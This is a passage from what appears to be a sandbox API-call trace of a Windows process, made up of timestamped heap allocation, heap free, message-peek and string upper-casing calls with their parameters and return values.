lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0150.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0150.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0150.220] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0150.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b08 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0150.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0150.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa018 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0150.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0150.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0150.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0150.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.222] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0150.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0150.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0150.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0150.223] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0150.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.237] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0150.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0150.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.238] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.238] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.238] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0150.239] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0150.239] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.240] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0150.240] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fd0 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0150.240] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0150.240] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0150.240] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.240] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0150.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.241] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0150.241] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0150.241] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0f0 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0150.241] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0150.241] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.241] 